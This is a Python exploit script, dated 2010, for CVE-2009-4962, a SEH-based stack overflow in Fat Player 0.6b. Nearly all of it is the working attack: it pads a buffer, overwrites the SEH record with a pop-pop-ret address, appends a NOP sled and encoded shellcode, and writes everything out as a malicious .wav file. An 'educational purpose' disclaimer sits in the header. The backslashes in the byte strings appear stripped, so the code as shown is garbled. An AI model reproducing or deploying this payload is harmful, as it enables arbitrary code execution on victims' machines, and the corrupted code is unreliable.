#################################################################################################
#    	Stack-based buffer overflow in Fat Player 0.6b allows remote attackers to execute 
#	arbitrary code via a long string in a .wav file. NOTE: some of these details are 
#	obtained from third party information.
#
#    Reference:
#    	http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4962
#    	http://xforce.iss.net/xforce/xfdb/52713
#	http://sourceforge.net/projects/fatplayer/
#	http://www.exploit-db.com/exploits/9495/
#
#    Tested on: Windows XP SP3, FatPlayer 0.6b
#
#
#    This was strictly written for educational purpose. Use it at your own risk.
#    Author will not bare any responsibility for any damages watsoever.
#
#        Author:	Praveen Darshanam
#        Email:		praveen[underscore]recker[at]sify.com
#	 Blog: 		http://darshanams.blogspot.com
#        Date:		10th August, 2010
#
#
#################################################################################################

print "nFat Player 0.6b WAV File Processing Buffer Overflow (SEH)"

buff1 = "D" * 4132

nseh = "xebx06x90x90"
seh_ppr = "x39x1fxd1x72"
#0x72D11F39      pop edi - pop - retbis	msacm32.drv

noop = "x90" * 10
code2exec = ("xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1x1ex58x31x78x18x83xe8xfcx03x78x68xf4x85x30x78xbcx65xc9x78xb6x23xf5xf3xb4xaex7dx02xaax3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6bxf0x27xddx48xfdx22x38x1bxa2xe8xc3xf7x3bx7axcfx4cx4fx23xd3x53xa4x57xf7xd8x3bx83x8ex83x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98xf5xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61xb6x0ex2fx85x19x87xb7x78x2fx59x90x7bxd7x05x7fxe8x7bxca")

buff2 = "Z" * (40000 - len(buff1) - len(nseh) - len(seh_ppr) - len(noop) - len(code2exec))
mal_buff = buff1 + nseh + seh_ppr + noop + code2exec + buff2

try:
	fatpwav = open ("fatplayerboseh.wav","w")
	fatpwav.write(mal_buff)
	fatpwav.close()
	print "nMalicious WAV File Created . . . !!"
	print "[+] Coded by Praveen Darshanam"
except:
	print "nUnable to Create Filen"